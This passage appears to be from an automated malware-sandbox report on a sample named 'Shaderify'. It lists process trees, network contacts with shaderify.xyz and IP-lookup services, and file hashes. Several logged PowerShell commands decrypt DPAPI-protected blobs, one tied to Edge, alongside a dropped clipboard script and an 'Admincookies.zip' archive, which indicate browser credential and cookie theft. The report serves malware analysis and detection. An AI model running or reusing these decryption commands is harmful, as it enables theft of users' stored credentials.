C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,141,247,97,18,0,223,25,105,159,95,1,13,45,223,226,244,76,155,218,204,185,9,81,102,32,42,219,93,217,210,20,229,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,22,135,125,102,183,6,14,93,69,8,241,27,19,68,141,0,52,65,125,34,2,169,120,13,12,139,71,183,106,227,160,96,48,0,0,0,53,194,236,4,4,15,128,129,74,75,108,75,254,138,31,104,162,74,131,235,190,140,141,225,165,187,255,143,230,9,24,141,75,152,31,49,159,25,200,114,235,221,10,94,100,162,164,91,64,0,0,0,160,2,159,108,227,0,139,100,90,190,144,91,160,16,0,118,0,237,223,39,21,94,23,207,116,182,141,19,207,134,155,38,28,244,48,159,24,116,68,156,9,108,110,206,16,97,118,23,190,47,18,79,251,223,252,102,63,250,246,142,53,220,95,173), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,35,34,250,209,79,219,135,79,142,220,79,126,12,193,145,62,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,122,186,59,106,159,138,3,96,16,128,17,122,8,139,244,254,106,175,103,37,20,249,57,194,158,27,178,137,187,116,192,25,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,51,236,46,156,240,143,65,80,220,246,189,52,39,90,104,221,208,87,182,76,56,254,202,35,90,104,4,211,157,136,246,34,48,0,0,0,236,136,210,242,56,175,158,131,62,105,152,134,63,166,243,205,78,109,3,103,229,75,107,28,226,76,68,224,129,151,35,136,155,178,159,173,136,168,183,248,130,255,73,20,171,117,100,54,64,0,0,0,105,122,195,241,66,118,127,24,231,89,139,64,153,192,36,27,119,201,84,191,71,217,202,229,245,17,171,106,172,111,14,159,154,23,121,146,201,140,245,239,210,69,138,85,51,152,9,20,64,9,10,136,255,245,250,138,57,107,104,198,95,38,18,158), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1824 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2184 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\Shaderify.exe
"C:\Users\Admin\AppData\Local\Temp\Shaderify.exe" --type=gpu-process --field-trial-handle=1500,12723749145653602269,8771074544358891808,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1744 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | 205.13.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.219.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 172.67.219.241:443 | shaderify.xyz | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\6fd5f1a7-81b0-4b07-9a50-3e49240a1501.tmp.node
| MD5 | 56192831a7f808874207ba593f464415 |
| SHA1 | e0c18c72a62692d856da1f8988b0bc9c8088d2aa |
| SHA256 | 6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c |
| SHA512 | c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_z4ek2nip.huh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4124-7-0x00000213AF5D0000-0x00000213AF5F2000-memory.dmp
C:\ProgramData\edge\Updater\Get-Clipboard.ps1
| MD5 | 52cc110bb3777aa6bba7900630d4eb49 |
| SHA1 | 3663dc658fd13d407e49781d1a5c2aa203c252fc |
| SHA256 | 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6 |
| SHA512 | 89b80d2783e902d68ffd08b6f3fb1848ae6e6c4bf2d7a1e4afdac970b2ee6ffcc58116cdd6234e3d6278eb9413d36aafe62b5beca24a0846575d12af0c5112ab |
\??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.cmdline
| MD5 | 0dad2a256aacf25ea2d570c6015d33d1 |
| SHA1 | 301639d7e32a844b25290d13ae1e09a06cf56589 |
| SHA256 | 38063aea7398717e64557d2619ec90a0725ff174cf66e2191a6d03c09fabcaa9 |
| SHA512 | 76469bfbf8b8fe87e137b87550710ea852fa91e7ba582012ea06deec2c7540cf11bbe4ab70064e99b7e178325031415c79abef82e71b80bd4959ac98b9146dd8 |
\??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.0.cs
| MD5 | b462a7b0998b386a2047c941506f7c1b |
| SHA1 | 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f |
| SHA256 | a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35 |
| SHA512 | eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020 |
\??\c:\Users\Admin\AppData\Local\Temp\gvzwrytg\CSC560CAE5A71D24B2D88A8B8609B673FC9.TMP
| MD5 | 0d66267aad53025049acbd10e4f1b994 |
| SHA1 | cdb2f831b62a9899dc10d899cac2af6c6727d6d9 |
| SHA256 | b177e4615b779ef9018f2546d3575763087e68cb59254be41aac20a7a7e4ace7 |
| SHA512 | e9459f4b0d45a46d0285d53a992f9fbbb290b7b018aabfb16727a2cc164cdffe5e12335d10e2e26513bd79e746df031630c12c2b678ee2bb9e42611cb1e931e7 |
C:\Users\Admin\AppData\Local\Temp\RES5D91.tmp
| MD5 | cbddbe67e099b2400e5c3afeb2315f17 |
| SHA1 | cc8bcf8edbfdbe6520e4b484648752ef7d0a9e43 |
| SHA256 | 5b1571e9ecbdb663625181683d64586c3ec9766a3dd59d66850bcbe7c9b1259c |
| SHA512 | c5f9a2af35455c2321f68a98660828edde4dd82724611638c351440560009c3fa1bc5fe6365403c1c6231990a7eac25b578a0f5b44882c12ee5f701ef3bea723 |
C:\Users\Admin\AppData\Local\Temp\gvzwrytg\gvzwrytg.dll
| MD5 | 5b55dc709f69b621430f4a7455417228 |
| SHA1 | 92a8727041b3ffaeb82659f52c952834ab16e89d |
| SHA256 | 805d2635a07e5920d7c3da733094872368778f077c121ff9f876ede1f4575b02 |
| SHA512 | ee521dac7b1a51f19da9abfc26861737e0aa20c1bf9e498ebceff7a0866585597e7dbf0218e699f6743b6644bba83047e48d3fed2735ae9a729561f77caf466e |
memory/4124-30-0x00000213AFA90000-0x00000213AFA98000-memory.dmp
memory/1592-43-0x0000021030E30000-0x0000021030E80000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f48896adf9a23882050cdff97f610a7f |
| SHA1 | 4c5a610df62834d43f470cae7e851946530e3086 |
| SHA256 | 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78 |
| SHA512 | 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 895e2a42e94e9cd0f28eaa2b6ecc01c2 |
| SHA1 | 1853f120520e8fa793825de95434557215ee0b1f |
| SHA256 | 2930446921bad0e440a607731e8488965a039dd60ef8432fbf0d2412d4e1dae7 |
| SHA512 | acd1c8d88d69788f03d50224413fcae52d026b01b6bc311570114d68aed1fbbfeac67d9361115d9386555239c50ea490985d3f375d6a3b49339b7f960154d4f0 |
memory/3320-68-0x00007FFE32950000-0x00007FFE32951000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Admincookies.zip
| MD5 | 76cdb2bad9582d23c1f6f4d868218d6c |
| SHA1 | b04f3ee8f5e43fa3b162981b50bb72fe1acabb33 |
| SHA256 | 8739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85 |
| SHA512 | 5e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f |
memory/3320-87-0x0000021BCF900000-0x0000021BCFA2A000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | udp |
Files
Analysis: behavioral18
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win7-20231129-en
Max time kernel
120s
Max time network
129s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\resources\app.js
Network
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240426-en
Max time kernel
89s
Max time network
157s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\resources\app.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:50
Platform
win7-20240215-en
Max time kernel
117s
Max time network
119s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 220
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-03 09:47
Reported
2024-06-03 09:51
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
154s
Command Line
Signatures
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffff33646f8,0x7ffff3364708,0x7ffff3364718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,10398541712313245205,2258270527647106578,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1048 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 439b5e04ca18c7fb02cf406e6eb24167 |
| SHA1 | e0c5bb6216903934726e3570b7d63295b9d28987 |
| SHA256 | 247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654 |
| SHA512 | d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2 |
\??\pipe\LOCAL\crashpad_1648_LMRTEVRMJAKVTXLU
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | a8e767fd33edd97d306efb6905f93252 |
| SHA1 | a6f80ace2b57599f64b0ae3c7381f34e9456f9d3 |
| SHA256 | c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb |
| SHA512 | 07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cd7b1a5fb9f51584a1f13ae724c04961 |
